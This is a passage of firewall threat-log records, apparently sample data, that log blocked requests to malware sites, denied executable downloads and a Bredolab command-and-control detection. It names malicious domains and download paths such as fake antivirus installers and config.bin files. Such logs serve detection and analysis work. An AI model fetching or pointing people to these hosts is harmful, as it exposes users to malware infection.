04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,69.43.161.167,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,"wantfinest.com/tds/in.cgi?default",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,202.31.187.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,"sameshitasiteverwas.com/traf/tds/in.cgi?2",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0, -Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,89.111.176.67,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,"svarkon.ru/update.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,"nolagtime.com/gwc.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,"findnolimits.com/go.php?sid=1",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/moun.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/palast.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,216.8.179.25,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,"www.15min.it/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0, -Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,69.43.161.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,"tubemov.com/",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,208.91.196.252,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,"pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0, -Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,"movfree.com/",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,"boialex.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,"edw-melon.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,"maximtushin.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,207.46.140.46,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,"default.aspx",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,65.54.71.11,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,"c.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,74.125.239.6,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 